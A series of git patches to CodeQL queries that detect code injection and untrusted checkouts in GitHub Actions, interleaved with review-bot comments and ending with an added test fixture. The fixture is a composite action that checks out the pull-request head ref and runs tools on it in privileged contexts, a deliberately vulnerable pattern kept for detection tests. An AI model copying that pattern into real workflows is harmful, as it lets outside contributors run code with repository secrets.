sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and - source.getNode().(RemoteFlowSource).getEvent() = event and + source.getNode().(RemoteFlowSource).getEventName() = event.getName() and not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | From ef713ff13bbd387d51e073fff03efde41f814357 Mon Sep 17 00:00:00 2001 
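Review bot: In the `CodeInjectionCritical.ql` hunk, `source.getNode().(RemoteFlowSource).getEventName() = event.getName()` pairs source and privileged sink by event name only, whereas the removed `getEvent() = event` required the same `Event` node. Event names are presumably unique within one workflow, so the result is the same there; but if a path can cross workflow boundaries (reusable workflows or composite actions), a source triggered by a same-named event in another file now satisfies the condition, which is looser than before. If that is intended, a one-line comment such as `// match by event name: sources no longer carry an Event node` next to the condition would make the relaxation explicit; the `from`/`where` clause continues outside the hunk.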
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:30:10 +0100 Subject: [PATCH 680/707] Extract GitHub context access expression into its own class --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 108 ++++++++++++++------- 2 files changed, 76 insertions(+), 34 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ad7bd67a18c8..8c1925f3288c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -379,6 +379,8 @@ class JsonReferenceExpression extends AstNode instanceof JsonReferenceExpression string getInnerExpression() { result = super.getInnerExpression() } } +class GitHubExpression extends SimpleReferenceExpression instanceof GitHubExpressionImpl { } + class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e5ad86a226c8..e331eff9bd29 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -1540,25 +1540,27 @@ string getAJsonReferenceAccessPath(string s, int offset) { * A ${{}} expression accessing a sigcle context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { - string expression; - +class SimpleReferenceExpressionImpl extends ExpressionImpl { SimpleReferenceExpressionImpl() { + exists(getASimpleReferenceExpression(this.getFullExpression(), _)) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) + } + + override string getExpression() { ( - expression = getASimpleReferenceExpression(this.getFullExpression(), _) + result = getASimpleReferenceExpression(this.getFullExpression(), _) or exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and - expression = this.getFullExpression() + result = this.getFullExpression() ) } - override string getExpression() { result = expression } - abstract string getFieldName(); abstract AstNodeImpl getTarget(); - override string toString() { result = expression } + override string toString() { result = this.getFullExpression() } } class JsonReferenceExpressionImpl extends ExpressionImpl { 
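Review bot: The new `override string toString() { result = this.getFullExpression() }` changes what a `SimpleReferenceExpressionImpl` prints: the removed version returned the `expression` field, which for the simple-reference branch was the inner reference from `getASimpleReferenceExpression(...)`, not the full expression. Any `.expected` file or alert message that renders these nodes may therefore change, and the diffstat for this commit lists only the two `Ast.qll` files, so the test output is presumably left to a later commit. Keeping `result = this.getExpression()` in `toString()` would preserve the previous rendering while still dropping the field. Also, with the class no longer `abstract`, an expression that matches neither `GitHubExpressionImpl` nor any other subclass is now a `SimpleReferenceExpressionImpl` whose abstract `getFieldName()`/`getTarget()` have no result; a comment stating that this is intended would help readers of the class.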
@@ -1597,6 +1599,44 @@ private string inputsCtxRegex() { private string secretsCtxRegex() { result = wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } +private string githubCtxRegex() { + result = wrapRegexp("github\\.([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)") +} + +/** + * Holds for an expression accesing the `github` context. + * e.g. `${{ github.head_ref }}` + */ +class GitHubExpressionImpl extends SimpleReferenceExpressionImpl { + GitHubExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(githubCtxRegex()) + ) + } + + override string getFieldName() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + result = expr.regexpCapture(githubCtxRegex(), 1) + ) + } + + override AstNodeImpl getTarget() { none() } +} + /** * Holds for an expression accesing the `secrets` context. * e.g. `${{ secrets.FOO }}` 
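Review bot: `GitHubExpressionImpl` repeats the same seven-line `exists(string expr | ...)` normalisation in both its characteristic predicate and `getFieldName()`, so the two can silently drift (the Secrets/Steps/Needs/Jobs/Env/Matrix classes in the following hunks carry the same duplicated shape, and already differ in whether they unwrap `fromjson` or `(from|to)json`). Moving the unwrapping into one private module-level predicate keeps the charpred and the accessor in step. Note also that `githubCtxRegex()` admits `.`, `[`, `]`, quotes and parentheses in its capture group, so `getFieldName()` presumably yields whole access paths such as `event.pull_request.head.ref` rather than a single field; the QLDoc should say so, e.g. `/** Gets the access path after the `github.` prefix, e.g. `head_ref` or `event.pull_request.head.ref`. */`.
```ql
/** Gets the normalized reference inside `e`, unwrapping a `fromJSON(...)` call when present. */
private string getGitHubCtxCandidate(SimpleReferenceExpressionImpl e) {
  exists(getAJsonReferenceExpression(e.getExpression(), _)) and
  result = normalizeExpr(e.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1)
  or
  exists(getASimpleReferenceExpression(e.getExpression(), _)) and
  result = normalizeExpr(e.getExpression())
}

class GitHubExpressionImpl extends SimpleReferenceExpressionImpl {
  GitHubExpressionImpl() { getGitHubCtxCandidate(this).regexpMatch(githubCtxRegex()) }

  override string getFieldName() {
    result = getGitHubCtxCandidate(this).regexpCapture(githubCtxRegex(), 1)
  }

  // … unchanged: getTarget …
}
```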
@@ -1607,11 +1647,11 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { SecretsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(secretsCtxRegex()) and fieldName = expr.regexpCapture(secretsCtxRegex(), 1) @@ -1635,11 +1675,11 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { StepsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(stepsCtxRegex()) and stepId = expr.regexpCapture(stepsCtxRegex(), 1) and 
@@ -1676,11 +1716,11 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { NeedsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(needsCtxRegex()) and fieldName = expr.regexpCapture(needsCtxRegex(), 2) and @@ -1720,11 +1760,11 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { JobsExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(jobsCtxRegex()) and jobId = expr.regexpCapture(jobsCtxRegex(), 1) and @@ -1752,8 +1792,8 @@ class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { - normalizeExpr(expression).regexpMatch(inputsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(inputsCtxRegex(), 1) + normalizeExpr(this.getExpression()).regexpMatch(inputsCtxRegex()) and + fieldName = normalizeExpr(this.getExpression()).regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } 
@@ -1779,11 +1819,11 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { EnvExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(envCtxRegex()) and fieldName = expr.regexpCapture(envCtxRegex(), 1) @@ -1814,11 +1854,11 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { MatrixExpressionImpl() { exists(string expr | ( - exists(getAJsonReferenceExpression(expression, _)) and - expr = normalizeExpr(expression).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) or - exists(getASimpleReferenceExpression(expression, _)) and - expr = normalizeExpr(expression) + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) ) and expr.regexpMatch(matrixCtxRegex()) and fieldAccess = expr.regexpCapture(matrixCtxRegex(), 1) From 3591db9e9cdfaa05a8b8bf6becb1f1fb83c2cdcd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:32:09 +0100 Subject: [PATCH 681/707] Remove artifact source as a source of PR refs --- .../security/UntrustedCheckoutQuery.qll | 26 ++++++++++++------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 1a75f8a96c16..12a65a52baaf 100644 
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -15,8 +15,6 @@ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { ( // remote flow sources - source instanceof ArtifactSource - or source instanceof GitHubCtxSource or source instanceof GitHubEventCtxSource @@ -245,10 +243,14 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt exists(string value, Expression expr | value.regexpMatch(".*(head|branch|ref).*") and expr = this.getArgumentExpr("ref") | - expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value or - expr.(NeedsExpression).getNeededJobId() = value or - expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or expr.(JsonReferenceExpression).getInnerExpression() = value ) ) @@ -275,10 +277,14 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { exists(string value, Expression expr | value.regexpMatch(".*(head|sha|commit).*") and expr = this.getArgumentExpr("ref") | - expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value or - expr.(NeedsExpression).getNeededJobId() = value or - expr.(JsonReferenceExpression).getAccessPath() = value or + expr.(StepsExpression).getStepId() = value + or + expr.(SimpleReferenceExpression).getFieldName() = value + or + expr.(NeedsExpression).getNeededJobId() = value + or + expr.(JsonReferenceExpression).getAccessPath() = value + or expr.(JsonReferenceExpression).getInnerExpression() = value ) ) From f3ada4a92b32b6444755339843600b70ba524e6e Mon Sep 17 00:00:00 2001 
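Review bot: Dropping `source instanceof ArtifactSource` from `isSource` in `ActionsMutableRefCheckoutConfig` removes a detection path without any comment explaining why an artifact-derived value is no longer considered a PR ref. A value read back from an artifact produced by an unprivileged run (the `steps.artifact.outputs.pr_number` pattern visible in the earlier `untrusted_checkout1.yml` expected output) is a plausible way for a mutable ref to reach a checkout step, and the later expected-file diffstat in this series shows four `UntrustedCheckoutCritical` results disappearing, so this looks like a coverage reduction rather than a pure refactor. A one-line rationale next to the remaining sources, e.g. `// artifact contents are modelled separately and are not treated as PR refs here`, would let future readers tell intent from omission. The two reformatted `or` chains in `ActionsMutableRefCheckout` and `ActionsSHACheckout` are otherwise unchanged.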
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:32:26 +0100 Subject: [PATCH 682/707] Update CompositeActionSources expected file --- .../query-tests/Models/CompositeActionsSources.expected | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/ql/test/query-tests/Models/CompositeActionsSources.expected b/ql/test/query-tests/Models/CompositeActionsSources.expected index 87c185fb5e12..3be74bb8bf12 100644 --- a/ql/test/query-tests/Models/CompositeActionsSources.expected +++ b/ql/test/query-tests/Models/CompositeActionsSources.expected 
@@ -1,12 +1,21 @@ edges +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths #select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | 
steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | From f6d20195b1e710240e461d8edd771d978488f073 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 17:33:13 +0100 Subject: [PATCH 683/707] When trigger event is not known, do not check context trigger maps --- .../codeql/actions/dataflow/FlowSources.qll | 32 ++++++++++++------- 1 file changed, 20 insertions(+), 12 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9259f18f108c..df3d513d0050 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -31,16 +31,19 @@ abstract class RemoteFlowSource extends SourceNode { class GitHubCtxSource extends RemoteFlowSource { string flag; string event; + GitHubExpression e; GitHubCtxSource() { - exists(Expression e, string context, string context_prefix | - this.asExpr() = e and - context = e.getExpression() and - normalizeExpr(context) = "github.head_ref" and - event = e.getEnclosingWorkflow().getATriggerEvent().getName() and - contextTriggerDataModel(event, context_prefix) and - normalizeExpr(context).matches("%" + context_prefix + "%") and - flag = "branch" + this.asExpr() = e and + // github.head_ref + e.getFieldName() = "head_ref" and + flag = "branch" and + ( + event = e.getATriggerEvent().getName() and + event = "pull_request_target" + or + not exists(e.getATriggerEvent()) and + event = "unknown" ) } @@ -58,15 +61,16 @@ class GitHubEventCtxSource extends RemoteFlowSource { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getATriggerEvent().getName() and ( // the context is available for the job trigger events + event = e.getATriggerEvent().getName() and exists(string context_prefix | contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or - exists(e.getEnclosingCompositeAction()) + not exists(e.getATriggerEvent()) and + event = "unknown" ) and untrustedEventPropertiesDataModel(regexp, flag) and not flag = "json" and 
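Review bot: `GitHubCtxSource` now hard-codes `event = "pull_request_target"` for `github.head_ref`, replacing the data-model lookup `contextTriggerDataModel(event, context_prefix)` that the removed lines used; if the trigger model also mapped that context to other events (e.g. `pull_request` or `workflow_run`), those sources are silently lost, and if it did not, a comment saying that `head_ref` is only attacker-controlled under `pull_request_target` would justify the literal. The `"unknown"` sentinel introduced here and in `GitHubEventCtxSource` is a magic string repeated across classes and, because `CodeInjectionCritical.ql` compares `getEventName()` with `event.getName()`, it can never equal a real trigger, so trigger-less sources are presumably excluded from the Critical query by construction; a named predicate such as `string unknownEventName() { result = "unknown" }` with a QLDoc stating that consequence would make this explicit. The field named `e` is also easy to confuse with the `Expression e` locals used by the sibling classes; `GitHubExpression ghExpr` would read more clearly.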
@@ -182,20 +186,24 @@ class GitHubEventJsonSource extends RemoteFlowSource { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent().getName() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and exists(string context_prefix | contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") or - // github.event is taintes for all triggers + // github.event is tainted for all triggers + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*") + or + not exists(e.getATriggerEvent()) and + event = "unknown" ) and flag = "json" ) From b80d3d56a364d7ddcd718126ba7ac559a3fcae64 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 21:47:09 +0100 Subject: [PATCH 684/707] exclude Simple refereces from GitHub context --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 12a65a52baaf..9668fce2ae00 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
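Review bot: In the "github.event is tainted for all triggers" branch, `event` is bound to `e.getEnclosingWorkflow().getATriggerEvent().getName()` but the model check then re-evaluates `contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _)` independently, so a workflow with several triggers binds `event` to every trigger name as long as any one of them is in the model; it should read `contextTriggerDataModel(event, _)`. The new fallback branch tests `not exists(e.getATriggerEvent())` while the two branches above it use `e.getEnclosingWorkflow().getATriggerEvent()`; if those two accessors can differ for the same expression, the `"unknown"` branch may fire alongside a real event or never at all, so the class should use one of them consistently. The enclosing `exists(...)` of the characteristic predicate starts before this hunk.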
@@ -245,7 +245,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt | expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression or expr.(NeedsExpression).getNeededJobId() = value or @@ -279,7 +280,8 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { | expr.(StepsExpression).getStepId() = value or - expr.(SimpleReferenceExpression).getFieldName() = value + expr.(SimpleReferenceExpression).getFieldName() = value and + not expr instanceof GitHubExpression or expr.(NeedsExpression).getNeededJobId() = value or From bee0668cd0981df475b958469bf78d22bcd0e9d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 21:47:28 +0100 Subject: [PATCH 685/707] Add tests and update expected results --- .../.github/actions/action6/action.yml | 251 +++++++++++++++++ .../.github/actions/action7/action.yml | 252 ++++++++++++++++++ .../CWE-094/.github/workflows/test28.yml | 34 +++ .../CWE-094/CodeInjectionCritical.expected | 9 + .../CWE-094/CodeInjectionMedium.expected | 15 ++ .../UntrustedCheckoutCritical.expected | 4 - 6 files changed, 561 insertions(+), 4 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test28.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml new file mode 100644 index 000000000000..0048a4ca31e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml 
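Review bot: The same disjunction over `StepsExpression`, `SimpleReferenceExpression` and `NeedsExpression` is edited identically in `ActionsMutableRefCheckout` and `ActionsSHACheckout`, and the new `not expr instanceof GitHubExpression` guard had to be added twice; extracting the disjunction into one shared predicate (for example `predicate refersToValue(Expression expr, string value)`) would stop the two checkout classes from drifting apart. The guard also carries no explanation in either hunk; a comment such as `// github.* references are modelled as remote sources elsewhere, not as references to a step, job or input` would tell a reader why a simple reference whose field name matches `value` is skipped, presumably because `GitHubExpression` is itself a `SimpleReferenceExpression` that would otherwise match names like `head_ref`. The enclosing predicates begin before the hunks.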
@@ -0,0 +1,251 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q 
git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name 
should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! 
-path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list 